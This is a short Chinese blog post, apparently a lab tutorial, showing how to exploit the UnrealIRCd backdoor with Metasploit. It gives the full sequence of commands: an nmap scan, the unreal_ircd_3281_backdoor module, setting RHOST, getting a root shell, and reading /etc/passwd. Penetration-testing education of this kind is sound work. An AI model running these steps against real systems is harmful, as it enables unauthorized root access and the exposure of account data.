Metasploit溢出UnrealIRCd后门漏洞
2017-12-18 本文已影响0人
Killshadow
目的
- 利用UnrealIRCd后门漏洞,获取目标主机的root权限。
原理
- 某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。
步骤
- 使用nmap命令对目标主机进行扫描。
nmap -sV 目标ip
,对目标主机进行端口扫描,发现对应开放的端口,对应服务。 - 在终端中输入命令
msfconsole
,启动MSF终端。 - 命令
search unreal ircd
,搜索ircd的相关工具和攻击载荷。 - 命令
use exploit/unix/irc/unreal_ircd_3281_backdoor
,启动漏洞利用模块,提示符就会提示进入到该路径下。 - 在终端中输入命令
show options
,查看需要设置的相关项,yes
表示必须填写的参数。 - 命令
set RHOST 192.168.1.3
,设置目标主机的IP地址。 - 在终端中输入
exploit
,开始向目标主机攻击,攻击成功后,建立shell会话。 - 在终端中输入
whoami
,查看获得的权限为root,输入命令`cat /etc/passwd',查看系统的帐号和密码。